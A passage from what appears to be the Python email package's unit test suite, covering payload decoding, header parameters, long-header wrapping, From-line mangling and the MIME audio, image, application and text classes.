eq(msg.get_payload(decode=True), 'hello world')
# Now try some bogus data
msg.set_payload('foo')
eq(msg.get_payload(decode=True), 'foo')
def test_decoded_generator(self):
eq = self.assertEqual
msg = self._msgobj('msg_07.txt')
fp = openfile('msg_17.txt')
try:
text = fp.read()
finally:
fp.close()
s = StringIO()
g = DecodedGenerator(s)
g.flatten(msg)
eq(s.getvalue(), text)
def test__contains__(self):
msg = Message()
msg['From'] = 'Me'
msg['to'] = 'You'
# Check for case insensitivity
self.failUnless('from' in msg)
self.failUnless('From' in msg)
self.failUnless('FROM' in msg)
self.failUnless('to' in msg)
self.failUnless('To' in msg)
self.failUnless('TO' in msg)
def test_as_string(self):
eq = self.assertEqual
msg = self._msgobj('msg_01.txt')
fp = openfile('msg_01.txt')
try:
text = fp.read()
finally:
fp.close()
eq(text, msg.as_string())
fullrepr = str(msg)
lines = fullrepr.split('\n')
self.failUnless(lines[0].startswith('From '))
eq(text, NL.join(lines[1:]))
def test_bad_param(self):
msg = email.message_from_string("Content-Type: blarg; baz; boo\n")
self.assertEqual(msg.get_param('baz'), '')
def test_missing_filename(self):
msg = email.message_from_string("From: foo\n")
self.assertEqual(msg.get_filename(), None)
def test_bogus_filename(self):
msg = email.message_from_string(
"Content-Disposition: blarg; filename\n")
self.assertEqual(msg.get_filename(), '')
def test_missing_boundary(self):
msg = email.message_from_string("From: foo\n")
self.assertEqual(msg.get_boundary(), None)
def test_get_params(self):
eq = self.assertEqual
msg = email.message_from_string(
'X-Header: foo=one; bar=two; baz=three\n')
eq(msg.get_params(header='x-header'),
[('foo', 'one'), ('bar', 'two'), ('baz', 'three')])
msg = email.message_from_string(
'X-Header: foo; bar=one; baz=two\n')
eq(msg.get_params(header='x-header'),
[('foo', ''), ('bar', 'one'), ('baz', 'two')])
eq(msg.get_params(), None)
msg = email.message_from_string(
'X-Header: foo; bar="one"; baz=two\n')
eq(msg.get_params(header='x-header'),
[('foo', ''), ('bar', 'one'), ('baz', 'two')])
def test_get_param_liberal(self):
msg = Message()
msg['Content-Type'] = 'Content-Type: Multipart/mixed; boundary = "CPIMSSMTPC06p5f3tG"'
self.assertEqual(msg.get_param('boundary'), 'CPIMSSMTPC06p5f3tG')
def test_get_param(self):
eq = self.assertEqual
msg = email.message_from_string(
"X-Header: foo=one; bar=two; baz=three\n")
eq(msg.get_param('bar', header='x-header'), 'two')
eq(msg.get_param('quuz', header='x-header'), None)
eq(msg.get_param('quuz'), None)
msg = email.message_from_string(
'X-Header: foo; bar="one"; baz=two\n')
eq(msg.get_param('foo', header='x-header'), '')
eq(msg.get_param('bar', header='x-header'), 'one')
eq(msg.get_param('baz', header='x-header'), 'two')
# XXX: We are not RFC-2045 compliant! We cannot parse:
# msg["Content-Type"] = 'text/plain; weird="hey; dolly? [you] @ <\\"home\\">?"'
# msg.get_param("weird")
# yet.
def test_get_param_funky_continuation_lines(self):
msg = self._msgobj('msg_22.txt')
self.assertEqual(msg.get_payload(1).get_param('name'), 'wibble.JPG')
def test_get_param_with_semis_in_quotes(self):
msg = email.message_from_string(
'Content-Type: image/pjpeg; name="Jim&&Jill"\n')
self.assertEqual(msg.get_param('name'), 'Jim&&Jill')
self.assertEqual(msg.get_param('name', unquote=False),
'"Jim&&Jill"')
def test_has_key(self):
msg = email.message_from_string('Header: exists')
self.failUnless(msg.has_key('header'))
self.failUnless(msg.has_key('Header'))
self.failUnless(msg.has_key('HEADER'))
self.failIf(msg.has_key('headeri'))
def test_set_param(self):
eq = self.assertEqual
msg = Message()
msg.set_param('charset', 'iso-2022-jp')
eq(msg.get_param('charset'), 'iso-2022-jp')
msg.set_param('importance', 'high value')
eq(msg.get_param('importance'), 'high value')
eq(msg.get_param('importance', unquote=False), '"high value"')
eq(msg.get_params(), [('text/plain', ''),
('charset', 'iso-2022-jp'),
('importance', 'high value')])
eq(msg.get_params(unquote=False), [('text/plain', ''),
('charset', '"iso-2022-jp"'),
('importance', '"high value"')])
msg.set_param('charset', 'iso-9999-xx', header='X-Jimmy')
eq(msg.get_param('charset', header='X-Jimmy'), 'iso-9999-xx')
def test_del_param(self):
eq = self.assertEqual
msg = self._msgobj('msg_05.txt')
eq(msg.get_params(),
[('multipart/report', ''), ('report-type', 'delivery-status'),
('boundary', 'D1690A7AC1.996856090/mail.example.com')])
old_val = msg.get_param("report-type")
msg.del_param("report-type")
eq(msg.get_params(),
[('multipart/report', ''),
('boundary', 'D1690A7AC1.996856090/mail.example.com')])
msg.set_param("report-type", old_val)
eq(msg.get_params(),
[('multipart/report', ''),
('boundary', 'D1690A7AC1.996856090/mail.example.com'),
('report-type', old_val)])
def test_del_param_on_other_header(self):
msg = Message()
msg.add_header('Content-Disposition', 'attachment', filename='bud.gif')
msg.del_param('filename', 'content-disposition')
self.assertEqual(msg['content-disposition'], 'attachment')
def test_set_type(self):
eq = self.assertEqual
msg = Message()
self.assertRaises(ValueError, msg.set_type, 'text')
msg.set_type('text/plain')
eq(msg['content-type'], 'text/plain')
msg.set_param('charset', 'us-ascii')
eq(msg['content-type'], 'text/plain; charset="us-ascii"')
msg.set_type('text/html')
eq(msg['content-type'], 'text/html; charset="us-ascii"')
def test_set_type_on_other_header(self):
msg = Message()
msg['X-Content-Type'] = 'text/plain'
msg.set_type('application/octet-stream', 'X-Content-Type')
self.assertEqual(msg['x-content-type'], 'application/octet-stream')
def test_get_content_type_missing(self):
msg = Message()
self.assertEqual(msg.get_content_type(), 'text/plain')
def test_get_content_type_missing_with_default_type(self):
msg = Message()
msg.set_default_type('message/rfc822')
self.assertEqual(msg.get_content_type(), 'message/rfc822')
def test_get_content_type_from_message_implicit(self):
msg = self._msgobj('msg_30.txt')
self.assertEqual(msg.get_payload(0).get_content_type(),
'message/rfc822')
def test_get_content_type_from_message_explicit(self):
msg = self._msgobj('msg_28.txt')
self.assertEqual(msg.get_payload(0).get_content_type(),
'message/rfc822')
def test_get_content_type_from_message_text_plain_implicit(self):
msg = self._msgobj('msg_03.txt')
self.assertEqual(msg.get_content_type(), 'text/plain')
def test_get_content_type_from_message_text_plain_explicit(self):
msg = self._msgobj('msg_01.txt')
self.assertEqual(msg.get_content_type(), 'text/plain')
def test_get_content_maintype_missing(self):
msg = Message()
self.assertEqual(msg.get_content_maintype(), 'text')
def test_get_content_maintype_missing_with_default_type(self):
msg = Message()
msg.set_default_type('message/rfc822')
self.assertEqual(msg.get_content_maintype(), 'message')
def test_get_content_maintype_from_message_implicit(self):
msg = self._msgobj('msg_30.txt')
self.assertEqual(msg.get_payload(0).get_content_maintype(), 'message')
def test_get_content_maintype_from_message_explicit(self):
msg = self._msgobj('msg_28.txt')
self.assertEqual(msg.get_payload(0).get_content_maintype(), 'message')
def test_get_content_maintype_from_message_text_plain_implicit(self):
msg = self._msgobj('msg_03.txt')
self.assertEqual(msg.get_content_maintype(), 'text')
def test_get_content_maintype_from_message_text_plain_explicit(self):
msg = self._msgobj('msg_01.txt')
self.assertEqual(msg.get_content_maintype(), 'text')
def test_get_content_subtype_missing(self):
msg = Message()
self.assertEqual(msg.get_content_subtype(), 'plain')
def test_get_content_subtype_missing_with_default_type(self):
msg = Message()
msg.set_default_type('message/rfc822')
self.assertEqual(msg.get_content_subtype(), 'rfc822')
def test_get_content_subtype_from_message_implicit(self):
msg = self._msgobj('msg_30.txt')
self.assertEqual(msg.get_payload(0).get_content_subtype(), 'rfc822')
def test_get_content_subtype_from_message_explicit(self):
msg = self._msgobj('msg_28.txt')
self.assertEqual(msg.get_payload(0).get_content_subtype(), 'rfc822')
def test_get_content_subtype_from_message_text_plain_implicit(self):
msg = self._msgobj('msg_03.txt')
self.assertEqual(msg.get_content_subtype(), 'plain')
def test_get_content_subtype_from_message_text_plain_explicit(self):
msg = self._msgobj('msg_01.txt')
self.assertEqual(msg.get_content_subtype(), 'plain')
def test_get_content_maintype_error(self):
msg = Message()
msg['Content-Type'] = 'no-slash-in-this-string'
self.assertEqual(msg.get_content_maintype(), 'text')
def test_get_content_subtype_error(self):
msg = Message()
msg['Content-Type'] = 'no-slash-in-this-string'
self.assertEqual(msg.get_content_subtype(), 'plain')
def test_replace_header(self):
eq = self.assertEqual
msg = Message()
msg.add_header('First', 'One')
msg.add_header('Second', 'Two')
msg.add_header('Third', 'Three')
eq(msg.keys(), ['First', 'Second', 'Third'])
eq(msg.values(), ['One', 'Two', 'Three'])
msg.replace_header('Second', 'Twenty')
eq(msg.keys(), ['First', 'Second', 'Third'])
eq(msg.values(), ['One', 'Twenty', 'Three'])
msg.add_header('First', 'Eleven')
msg.replace_header('First', 'One Hundred')
eq(msg.keys(), ['First', 'Second', 'Third', 'First'])
eq(msg.values(), ['One Hundred', 'Twenty', 'Three', 'Eleven'])
self.assertRaises(KeyError, msg.replace_header, 'Fourth', 'Missing')
def test_broken_base64_payload(self):
x = 'AwDp0P7//y6LwKEAcPa/6Q=9'
msg = Message()
msg['content-type'] = 'audio/x-midi'
msg['content-transfer-encoding'] = 'base64'
msg.set_payload(x)
self.assertEqual(msg.get_payload(decode=True), x)
# Test the email.encoders module
class TestEncoders(unittest.TestCase):
def test_encode_empty_payload(self):
eq = self.assertEqual
msg = Message()
msg.set_charset('us-ascii')
eq(msg['content-transfer-encoding'], '7bit')
def test_default_cte(self):
eq = self.assertEqual
msg = MIMEText('hello world')
eq(msg['content-transfer-encoding'], '7bit')
def test_default_cte(self):
eq = self.assertEqual
# With no explicit _charset its us-ascii, and all are 7-bit
msg = MIMEText('hello world')
eq(msg['content-transfer-encoding'], '7bit')
# Similar, but with 8-bit data
msg = MIMEText('hello \xf8 world')
eq(msg['content-transfer-encoding'], '8bit')
# And now with a different charset
msg = MIMEText('hello \xf8 world', _charset='iso-8859-1')
eq(msg['content-transfer-encoding'], 'quoted-printable')
# Test long header wrapping
class TestLongHeaders(TestEmailBase):
def test_split_long_continuation(self):
eq = self.ndiffAssertEqual
msg = email.message_from_string("""\
Subject: bug demonstration
\t12345678911234567892123456789312345678941234567895123456789612345678971234567898112345678911234567892123456789112345678911234567892123456789
\tmore text
test
""")
sfp = StringIO()
g = Generator(sfp)
g.flatten(msg)
eq(sfp.getvalue(), """\
Subject: bug demonstration
\t12345678911234567892123456789312345678941234567895123456789612345678971234567898112345678911234567892123456789112345678911234567892123456789
\tmore text
test
""")
def test_another_long_almost_unsplittable_header(self):
eq = self.ndiffAssertEqual
hstr = """\
bug demonstration
\t12345678911234567892123456789312345678941234567895123456789612345678971234567898112345678911234567892123456789112345678911234567892123456789
\tmore text"""
h = Header(hstr, continuation_ws='\t')
eq(h.encode(), """\
bug demonstration
\t12345678911234567892123456789312345678941234567895123456789612345678971234567898112345678911234567892123456789112345678911234567892123456789
\tmore text""")
h = Header(hstr)
eq(h.encode(), """\
bug demonstration
12345678911234567892123456789312345678941234567895123456789612345678971234567898112345678911234567892123456789112345678911234567892123456789
more text""")
def test_long_nonstring(self):
eq = self.ndiffAssertEqual
g = Charset("iso-8859-1")
cz = Charset("iso-8859-2")
utf8 = Charset("utf-8")
g_head = "Die Mieter treten hier ein werden mit einem Foerderband komfortabel den Korridor entlang, an s\xfcdl\xfcndischen Wandgem\xe4lden vorbei, gegen die rotierenden Klingen bef\xf6rdert. "
cz_head = "Finan\xe8ni metropole se hroutily pod tlakem jejich d\xf9vtipu.. "
utf8_head = u"\u6b63\u78ba\u306b\u8a00\u3046\u3068\u7ffb\u8a33\u306f\u3055\u308c\u3066\u3044\u307e\u305b\u3093\u3002\u4e00\u90e8\u306f\u30c9\u30a4\u30c4\u8a9e\u3067\u3059\u304c\u3001\u3042\u3068\u306f\u3067\u305f\u3089\u3081\u3067\u3059\u3002\u5b9f\u969b\u306b\u306f\u300cWenn ist das Nunstuck git und Slotermeyer? Ja! Beiherhund das Oder die Flipperwaldt gersput.\u300d\u3068\u8a00\u3063\u3066\u3044\u307e\u3059\u3002".encode("utf-8")
h = Header(g_head, g, header_name='Subject')
h.append(cz_head, cz)
h.append(utf8_head, utf8)
msg = Message()
msg['Subject'] = h
sfp = StringIO()
g = Generator(sfp)
g.flatten(msg)
eq(sfp.getvalue(), """\
Subject: =?iso-8859-1?q?Die_Mieter_treten_hier_ein_werden_mit_einem_Foerd?=
=?iso-8859-1?q?erband_komfortabel_den_Korridor_entlang=2C_an_s=FCdl=FCndi?=
=?iso-8859-1?q?schen_Wandgem=E4lden_vorbei=2C_gegen_die_rotierenden_Kling?=
=?iso-8859-1?q?en_bef=F6rdert=2E_?= =?iso-8859-2?q?Finan=E8ni_met?=
=?iso-8859-2?q?ropole_se_hroutily_pod_tlakem_jejich_d=F9vtipu=2E=2E_?=
=?utf-8?b?5q2j56K644Gr6KiA44GG44Go57+76Kiz44Gv44GV44KM44Gm44GE?=
=?utf-8?b?44G+44Gb44KT44CC5LiA6YOo44Gv44OJ44Kk44OE6Kqe44Gn44GZ44GM44CB?=
=?utf-8?b?44GC44Go44Gv44Gn44Gf44KJ44KB44Gn44GZ44CC5a6f6Zqb44Gr44Gv44CM?=
=?utf-8?q?Wenn_ist_das_Nunstuck_git_und_Slotermeyer=3F_Ja!_Beiherhund_das?=
=?utf-8?b?IE9kZXIgZGllIEZsaXBwZXJ3YWxkdCBnZXJzcHV0LuOAjeOBqOiogOOBow==?=
=?utf-8?b?44Gm44GE44G+44GZ44CC?=
""")
eq(h.encode(), """\
=?iso-8859-1?q?Die_Mieter_treten_hier_ein_werden_mit_einem_Foerd?=
=?iso-8859-1?q?erband_komfortabel_den_Korridor_entlang=2C_an_s=FCdl=FCndi?=
=?iso-8859-1?q?schen_Wandgem=E4lden_vorbei=2C_gegen_die_rotierenden_Kling?=
=?iso-8859-1?q?en_bef=F6rdert=2E_?= =?iso-8859-2?q?Finan=E8ni_met?=
=?iso-8859-2?q?ropole_se_hroutily_pod_tlakem_jejich_d=F9vtipu=2E=2E_?=
=?utf-8?b?5q2j56K644Gr6KiA44GG44Go57+76Kiz44Gv44GV44KM44Gm44GE?=
=?utf-8?b?44G+44Gb44KT44CC5LiA6YOo44Gv44OJ44Kk44OE6Kqe44Gn44GZ44GM44CB?=
=?utf-8?b?44GC44Go44Gv44Gn44Gf44KJ44KB44Gn44GZ44CC5a6f6Zqb44Gr44Gv44CM?=
=?utf-8?q?Wenn_ist_das_Nunstuck_git_und_Slotermeyer=3F_Ja!_Beiherhund_das?=
=?utf-8?b?IE9kZXIgZGllIEZsaXBwZXJ3YWxkdCBnZXJzcHV0LuOAjeOBqOiogOOBow==?=
=?utf-8?b?44Gm44GE44G+44GZ44CC?=""")
def test_long_header_encode(self):
eq = self.ndiffAssertEqual
h = Header('wasnipoop; giraffes="very-long-necked-animals"; '
'spooge="yummy"; hippos="gargantuan"; marshmallows="gooey"',
header_name='X-Foobar-Spoink-Defrobnit')
eq(h.encode(), '''\
wasnipoop; giraffes="very-long-necked-animals";
spooge="yummy"; hippos="gargantuan"; marshmallows="gooey"''')
def test_long_header_encode_with_tab_continuation(self):
eq = self.ndiffAssertEqual
h = Header('wasnipoop; giraffes="very-long-necked-animals"; '
'spooge="yummy"; hippos="gargantuan"; marshmallows="gooey"',
header_name='X-Foobar-Spoink-Defrobnit',
continuation_ws='\t')
eq(h.encode(), '''\
wasnipoop; giraffes="very-long-necked-animals";
\tspooge="yummy"; hippos="gargantuan"; marshmallows="gooey"''')
def test_header_splitter(self):
eq = self.ndiffAssertEqual
msg = MIMEText('')
# It'd be great if we could use add_header() here, but that doesn't
# guarantee an order of the parameters.
msg['X-Foobar-Spoink-Defrobnit'] = (
'wasnipoop; giraffes="very-long-necked-animals"; '
'spooge="yummy"; hippos="gargantuan"; marshmallows="gooey"')
sfp = StringIO()
g = Generator(sfp)
g.flatten(msg)
eq(sfp.getvalue(), '''\
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Foobar-Spoink-Defrobnit: wasnipoop; giraffes="very-long-necked-animals";
\tspooge="yummy"; hippos="gargantuan"; marshmallows="gooey"
''')
def test_no_semis_header_splitter(self):
eq = self.ndiffAssertEqual
msg = Message()
msg['From'] = 'test@dom.ain'
msg['References'] = SPACE.join(['<%d@dom.ain>' % i for i in range(10)])
msg.set_payload('Test')
sfp = StringIO()
g = Generator(sfp)
g.flatten(msg)
eq(sfp.getvalue(), """\
From: test@dom.ain
References: <0@dom.ain> <1@dom.ain> <2@dom.ain> <3@dom.ain> <4@dom.ain>
\t<5@dom.ain> <6@dom.ain> <7@dom.ain> <8@dom.ain> <9@dom.ain>
Test""")
def test_no_split_long_header(self):
eq = self.ndiffAssertEqual
hstr = 'References: ' + 'x' * 80
h = Header(hstr, continuation_ws='\t')
eq(h.encode(), """\
References: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx""")
def test_splitting_multiple_long_lines(self):
eq = self.ndiffAssertEqual
hstr = """\
from babylon.socal-raves.org (localhost [127.0.0.1]); by babylon.socal-raves.org (Postfix) with ESMTP id B570E51B81; for <mailman-admin@babylon.socal-raves.org>; Sat, 2 Feb 2002 17:00:06 -0800 (PST)
\tfrom babylon.socal-raves.org (localhost [127.0.0.1]); by babylon.socal-raves.org (Postfix) with ESMTP id B570E51B81; for <mailman-admin@babylon.socal-raves.org>; Sat, 2 Feb 2002 17:00:06 -0800 (PST)
\tfrom babylon.socal-raves.org (localhost [127.0.0.1]); by babylon.socal-raves.org (Postfix) with ESMTP id B570E51B81; for <mailman-admin@babylon.socal-raves.org>; Sat, 2 Feb 2002 17:00:06 -0800 (PST)
"""
h = Header(hstr, continuation_ws='\t')
eq(h.encode(), """\
from babylon.socal-raves.org (localhost [127.0.0.1]);
\tby babylon.socal-raves.org (Postfix) with ESMTP id B570E51B81;
\tfor <mailman-admin@babylon.socal-raves.org>;
\tSat, 2 Feb 2002 17:00:06 -0800 (PST)
\tfrom babylon.socal-raves.org (localhost [127.0.0.1]);
\tby babylon.socal-raves.org (Postfix) with ESMTP id B570E51B81;
\tfor <mailman-admin@babylon.socal-raves.org>;
\tSat, 2 Feb 2002 17:00:06 -0800 (PST)
\tfrom babylon.socal-raves.org (localhost [127.0.0.1]);
\tby babylon.socal-raves.org (Postfix) with ESMTP id B570E51B81;
\tfor <mailman-admin@babylon.socal-raves.org>;
\tSat, 2 Feb 2002 17:00:06 -0800 (PST)""")
def test_splitting_first_line_only_is_long(self):
eq = self.ndiffAssertEqual
hstr = """\
from modemcable093.139-201-24.que.mc.videotron.ca ([24.201.139.93] helo=cthulhu.gerg.ca)
\tby kronos.mems-exchange.org with esmtp (Exim 4.05)
\tid 17k4h5-00034i-00
\tfor test@mems-exchange.org; Wed, 28 Aug 2002 11:25:20 -0400"""
h = Header(hstr, maxlinelen=78, header_name='Received',
continuation_ws='\t')
eq(h.encode(), """\
from modemcable093.139-201-24.que.mc.videotron.ca ([24.201.139.93]
\thelo=cthulhu.gerg.ca)
\tby kronos.mems-exchange.org with esmtp (Exim 4.05)
\tid 17k4h5-00034i-00
\tfor test@mems-exchange.org; Wed, 28 Aug 2002 11:25:20 -0400""")
def test_long_8bit_header(self):
eq = self.ndiffAssertEqual
msg = Message()
h = Header('Britische Regierung gibt', 'iso-8859-1',
header_name='Subject')
h.append('gr\xfcnes Licht f\xfcr Offshore-Windkraftprojekte')
msg['Subject'] = h
eq(msg.as_string(), """\
Subject: =?iso-8859-1?q?Britische_Regierung_gibt?= =?iso-8859-1?q?gr=FCnes?=
=?iso-8859-1?q?_Licht_f=FCr_Offshore-Windkraftprojekte?=
""")
def test_long_8bit_header_no_charset(self):
eq = self.ndiffAssertEqual
msg = Message()
msg['Reply-To'] = 'Britische Regierung gibt gr\xfcnes Licht f\xfcr Offshore-Windkraftprojekte <a-very-long-address@example.com>'
eq(msg.as_string(), """\
Reply-To: Britische Regierung gibt gr\xfcnes Licht f\xfcr Offshore-Windkraftprojekte <a-very-long-address@example.com>
""")
def test_long_to_header(self):
eq = self.ndiffAssertEqual
to = '"Someone Test #A" <someone@eecs.umich.edu>,<someone@eecs.umich.edu>,"Someone Test #B" <someone@umich.edu>, "Someone Test #C" <someone@eecs.umich.edu>, "Someone Test #D" <someone@eecs.umich.edu>'
msg = Message()
msg['To'] = to
eq(msg.as_string(0), '''\
To: "Someone Test #A" <someone@eecs.umich.edu>, <someone@eecs.umich.edu>,
\t"Someone Test #B" <someone@umich.edu>,
\t"Someone Test #C" <someone@eecs.umich.edu>,
\t"Someone Test #D" <someone@eecs.umich.edu>
''')
def test_long_line_after_append(self):
eq = self.ndiffAssertEqual
s = 'This is an example of string which has almost the limit of header length.'
h = Header(s)
h.append('Add another line.')
eq(h.encode(), """\
This is an example of string which has almost the limit of header length.
Add another line.""")
def test_shorter_line_with_append(self):
eq = self.ndiffAssertEqual
s = 'This is a shorter line.'
h = Header(s)
h.append('Add another sentence. (Surprise?)')
eq(h.encode(),
'This is a shorter line. Add another sentence. (Surprise?)')
def test_long_field_name(self):
eq = self.ndiffAssertEqual
fn = 'X-Very-Very-Very-Long-Header-Name'
gs = "Die Mieter treten hier ein werden mit einem Foerderband komfortabel den Korridor entlang, an s\xfcdl\xfcndischen Wandgem\xe4lden vorbei, gegen die rotierenden Klingen bef\xf6rdert. "
h = Header(gs, 'iso-8859-1', header_name=fn)
# BAW: this seems broken because the first line is too long
eq(h.encode(), """\
=?iso-8859-1?q?Die_Mieter_treten_hier_?=
=?iso-8859-1?q?ein_werden_mit_einem_Foerderband_komfortabel_den_Korridor_?=
=?iso-8859-1?q?entlang=2C_an_s=FCdl=FCndischen_Wandgem=E4lden_vorbei=2C_g?=
=?iso-8859-1?q?egen_die_rotierenden_Klingen_bef=F6rdert=2E_?=""")
def test_long_received_header(self):
h = 'from FOO.TLD (vizworld.acl.foo.tld [123.452.678.9]) by hrothgar.la.mastaler.com (tmda-ofmipd) with ESMTP; Wed, 05 Mar 2003 18:10:18 -0700'
msg = Message()
msg['Received-1'] = Header(h, continuation_ws='\t')
msg['Received-2'] = h
self.assertEqual(msg.as_string(), """\
Received-1: from FOO.TLD (vizworld.acl.foo.tld [123.452.678.9]) by
\throthgar.la.mastaler.com (tmda-ofmipd) with ESMTP;
\tWed, 05 Mar 2003 18:10:18 -0700
Received-2: from FOO.TLD (vizworld.acl.foo.tld [123.452.678.9]) by
\throthgar.la.mastaler.com (tmda-ofmipd) with ESMTP;
\tWed, 05 Mar 2003 18:10:18 -0700
""")
def test_string_headerinst_eq(self):
h = '<15975.17901.207240.414604@sgigritzmann1.mathematik.tu-muenchen.de> (David Bremner\'s message of "Thu, 6 Mar 2003 13:58:21 +0100")'
msg = Message()
msg['Received-1'] = Header(h, header_name='Received-1',
continuation_ws='\t')
msg['Received-2'] = h
self.assertEqual(msg.as_string(), """\
Received-1: <15975.17901.207240.414604@sgigritzmann1.mathematik.tu-muenchen.de>
\t(David Bremner's message of "Thu, 6 Mar 2003 13:58:21 +0100")
Received-2: <15975.17901.207240.414604@sgigritzmann1.mathematik.tu-muenchen.de>
\t(David Bremner's message of "Thu, 6 Mar 2003 13:58:21 +0100")
""")
def test_long_unbreakable_lines_with_continuation(self):
eq = self.ndiffAssertEqual
msg = Message()
t = """\
iVBORw0KGgoAAAANSUhEUgAAADAAAAAwBAMAAAClLOS0AAAAGFBMVEUAAAAkHiJeRUIcGBi9
locQDQ4zJykFBAXJfWDjAAACYUlEQVR4nF2TQY/jIAyFc6lydlG5x8Nyp1Y69wj1PN2I5gzp"""
msg['Face-1'] = t
msg['Face-2'] = Header(t, header_name='Face-2')
eq(msg.as_string(), """\
Face-1: iVBORw0KGgoAAAANSUhEUgAAADAAAAAwBAMAAAClLOS0AAAAGFBMVEUAAAAkHiJeRUIcGBi9
\tlocQDQ4zJykFBAXJfWDjAAACYUlEQVR4nF2TQY/jIAyFc6lydlG5x8Nyp1Y69wj1PN2I5gzp
Face-2: iVBORw0KGgoAAAANSUhEUgAAADAAAAAwBAMAAAClLOS0AAAAGFBMVEUAAAAkHiJeRUIcGBi9
locQDQ4zJykFBAXJfWDjAAACYUlEQVR4nF2TQY/jIAyFc6lydlG5x8Nyp1Y69wj1PN2I5gzp
""")
def test_another_long_multiline_header(self):
eq = self.ndiffAssertEqual
m = '''\
Received: from siimage.com ([172.25.1.3]) by zima.siliconimage.com with Microsoft SMTPSVC(5.0.2195.4905);
\tWed, 16 Oct 2002 07:41:11 -0700'''
msg = email.message_from_string(m)
eq(msg.as_string(), '''\
Received: from siimage.com ([172.25.1.3]) by zima.siliconimage.com with
\tMicrosoft SMTPSVC(5.0.2195.4905); Wed, 16 Oct 2002 07:41:11 -0700
''')
def test_long_lines_with_different_header(self):
eq = self.ndiffAssertEqual
h = """\
List-Unsubscribe: <https://lists.sourceforge.net/lists/listinfo/spamassassin-talk>,
<mailto:spamassassin-talk-request@lists.sourceforge.net?subject=unsubscribe>"""
msg = Message()
msg['List'] = h
msg['List'] = Header(h, header_name='List')
eq(msg.as_string(), """\
List: List-Unsubscribe: <https://lists.sourceforge.net/lists/listinfo/spamassassin-talk>,
\t<mailto:spamassassin-talk-request@lists.sourceforge.net?subject=unsubscribe>
List: List-Unsubscribe: <https://lists.sourceforge.net/lists/listinfo/spamassassin-talk>,
<mailto:spamassassin-talk-request@lists.sourceforge.net?subject=unsubscribe>
""")
# Test mangling of "From " lines in the body of a message
class TestFromMangling(unittest.TestCase):
def setUp(self):
self.msg = Message()
self.msg['From'] = 'aaa@bbb.org'
self.msg.set_payload("""\
From the desk of A.A.A.:
Blah blah blah
""")
def test_mangled_from(self):
s = StringIO()
g = Generator(s, mangle_from_=True)
g.flatten(self.msg)
self.assertEqual(s.getvalue(), """\
From: aaa@bbb.org
>From the desk of A.A.A.:
Blah blah blah
""")
def test_dont_mangle_from(self):
s = StringIO()
g = Generator(s, mangle_from_=False)
g.flatten(self.msg)
self.assertEqual(s.getvalue(), """\
From: aaa@bbb.org
From the desk of A.A.A.:
Blah blah blah
""")
# Test the basic MIMEAudio class
class TestMIMEAudio(unittest.TestCase):
def setUp(self):
# Make sure we pick up the audiotest.au that lives in email/test/data.
# In Python, there's an audiotest.au living in Lib/test but that isn't
# included in some binary distros that don't include the test
# package. The trailing empty string on the .join() is significant
# since findfile() will do a dirname().
datadir = os.path.join(os.path.dirname(landmark), 'data', '')
fp = open(findfile('audiotest.au', datadir), 'rb')
try:
self._audiodata = fp.read()
finally:
fp.close()
self._au = MIMEAudio(self._audiodata)
def test_guess_minor_type(self):
self.assertEqual(self._au.get_content_type(), 'audio/basic')
def test_encoding(self):
payload = self._au.get_payload()
self.assertEqual(base64.decodestring(payload), self._audiodata)
def test_checkSetMinor(self):
au = MIMEAudio(self._audiodata, 'fish')
self.assertEqual(au.get_content_type(), 'audio/fish')
def test_add_header(self):
eq = self.assertEqual
unless = self.failUnless
self._au.add_header('Content-Disposition', 'attachment',
filename='audiotest.au')
eq(self._au['content-disposition'],
'attachment; filename="audiotest.au"')
eq(self._au.get_params(header='content-disposition'),
[('attachment', ''), ('filename', 'audiotest.au')])
eq(self._au.get_param('filename', header='content-disposition'),
'audiotest.au')
missing = []
eq(self._au.get_param('attachment', header='content-disposition'), '')
unless(self._au.get_param('foo', failobj=missing,
header='content-disposition') is missing)
# Try some missing stuff
unless(self._au.get_param('foobar', missing) is missing)
unless(self._au.get_param('attachment', missing,
header='foobar') is missing)
# Test the basic MIMEImage class
class TestMIMEImage(unittest.TestCase):
def setUp(self):
fp = openfile('PyBanner048.gif')
try:
self._imgdata = fp.read()
finally:
fp.close()
self._im = MIMEImage(self._imgdata)
def test_guess_minor_type(self):
self.assertEqual(self._im.get_content_type(), 'image/gif')
def test_encoding(self):
payload = self._im.get_payload()
self.assertEqual(base64.decodestring(payload), self._imgdata)
def test_checkSetMinor(self):
im = MIMEImage(self._imgdata, 'fish')
self.assertEqual(im.get_content_type(), 'image/fish')
def test_add_header(self):
eq = self.assertEqual
unless = self.failUnless
self._im.add_header('Content-Disposition', 'attachment',
filename='dingusfish.gif')
eq(self._im['content-disposition'],
'attachment; filename="dingusfish.gif"')
eq(self._im.get_params(header='content-disposition'),
[('attachment', ''), ('filename', 'dingusfish.gif')])
eq(self._im.get_param('filename', header='content-disposition'),
'dingusfish.gif')
missing = []
eq(self._im.get_param('attachment', header='content-disposition'), '')
unless(self._im.get_param('foo', failobj=missing,
header='content-disposition') is missing)
# Try some missing stuff
unless(self._im.get_param('foobar', missing) is missing)
unless(self._im.get_param('attachment', missing,
header='foobar') is missing)
# Test the basic MIMEApplication class
class TestMIMEApplication(unittest.TestCase):
def test_headers(self):
eq = self.assertEqual
msg = MIMEApplication('\xfa\xfb\xfc\xfd\xfe\xff')
eq(msg.get_content_type(), 'application/octet-stream')
eq(msg['content-transfer-encoding'], 'base64')
def test_body(self):
eq = self.assertEqual
bytes = '\xfa\xfb\xfc\xfd\xfe\xff'
msg = MIMEApplication(bytes)
eq(msg.get_payload(), '+vv8/f7/')
eq(msg.get_payload(decode=True), bytes)
# Test the basic MIMEText class
class TestMIMEText(unittest.TestCase):
def setUp(self):
self._msg = MIMEText('hello there')
def test_types(self):
eq = self.assertEqual
unless = self.failUnless
eq(self._msg.get_content_type(), 'text/plain')
eq(self._msg.get_param('charset'), 'us-ascii')
missing = []
unless(self._msg.get_param('foobar', missing) is missing)
unless(self._msg.get_param('charset', missing, header='foobar')
is missing)
def test_payload(self):
self.assertEqual(self._msg.get_payload(), 'hello there')
self.failUnless(not self._msg.is_multipart())
def test_charset(self):
eq = self.assertEqual
msg = MIMEText('hello there', _charset='us-ascii')
eq(msg.get_charset().input_charset, 'us-ascii')
eq(msg['content-type'], 'text/plain; charset="us-ascii"')
# Test complicated multipart/* messages
class TestMultipart(TestEmailBase):
def setUp(self):
